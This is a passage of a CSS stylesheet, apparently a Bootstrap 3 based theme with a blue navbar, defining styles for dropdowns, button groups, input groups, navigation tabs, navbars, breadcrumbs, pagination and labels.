.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #373737;
  outline: 0;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  right: 0;
  left: auto;
}
.dropdown-menu-left {
  right: auto;
  left: 0;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  right: 0;
  left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  content: "";
  border-top: 0;
  border-bottom: 4px dashed;
  border-bottom: 4px solid \9;
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    right: 0;
    left: auto;
  }
  .navbar-right .dropdown-menu-left {
    right: auto;
    left: 0;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-left: -1px;
}
.btn-toolbar {
  margin-left: -5px;
}
.btn-toolbar .btn,
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: left;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn-group {
  float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-right: 8px;
  padding-left: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-right: 12px;
  padding-left: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-left: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  display: table-cell;
  float: none;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  left: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-right: 0;
  padding-left: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: left;
  width: 100%;
  margin-bottom: 0;
}
.input-group .form-control:focus {
  z-index: 3;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: 400;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group-addon:first-child {
  border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.input-group-addon:last-child {
  border-left: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-left: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-right: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  z-index: 2;
  margin-left: -1px;
}
.nav {
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #0077bb;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: left;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-right: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0 0 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  cursor: default;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-right: 0;
  border-radius: 0;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: left;
}
.nav-pills > li > a {
  border-radius: 0;
}
.nav-pills > li + li {
  margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #0077bb;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-left: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-right: 0;
  border-radius: 0;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: left;
  }
}
.navbar-collapse {
  padding-right: 20px;
  padding-left: 20px;
  overflow-x: visible;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-right: 0;
    padding-left: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  right: 0;
  left: 0;
  z-index: 1030;
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-right: -20px;
  margin-left: -20px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-right: 0;
    margin-left: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-brand {
  float: left;
  height: 55px;
  padding: 17.5px 20px;
  font-size: 18px;
  line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-left: -20px;
  }
}
.navbar-toggle {
  position: relative;
  float: right;
  padding: 9px 10px;
  margin-right: 20px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 15px 5px 25px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: left;
    margin: 0;
  }
  .navbar-nav > li {
    float: left;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  padding: 10px 20px;
  margin-right: -20px;
  margin-left: -20px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-left: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    padding-top: 0;
    padding-bottom: 0;
    margin-right: 0;
    margin-left: 0;
    border: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: left;
    margin-right: 20px;
    margin-left: 20px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: left !important;
  }
  .navbar-right {
    float: right !important;
    margin-right: -20px;
  }
  .navbar-right ~ .navbar-right {
    margin-right: 0;
  }
}
.navbar-default {
  background-color: #0077bb;
  border-color: #0067a2;
}
.navbar-default .navbar-brand {
  color: #bbe6ff;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #88d4ff;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #bbe6ff;
}
.navbar-default .navbar-nav > li > a {
  color: #bbe6ff;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #bbe6ff;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-toggle {
  border-color: #0077bb;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #0077bb;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #0067a2;
}
.navbar-default .navbar-link {
  color: #bbe6ff;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #bbe6ff;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: #080808;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  padding: 0 5px;
  color: #999999;
  content: "/\00a0";
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-left: 0;
  margin: 20px 0;
  border-radius: 0;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: left;
  padding: 6px 12px;
  margin-left: -1px;
  line-height: 1.42857143;
  color: #0077bb;
  text-decoration: none;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  z-index: 2;
  color: #00466e;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 3;
  color: #ffffff;
  cursor: default;
  background-color: #0077bb;
  border-color: #0077bb;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
  border-color: #dddddd;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pager {
  padding-left: 0;
  margin: 20px 0;
  text-align: center;
  list-style: none;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: right;
}
.pager .previous > a,
.pager .previous > span {
  float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: 700;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #0077bb;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #005788;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
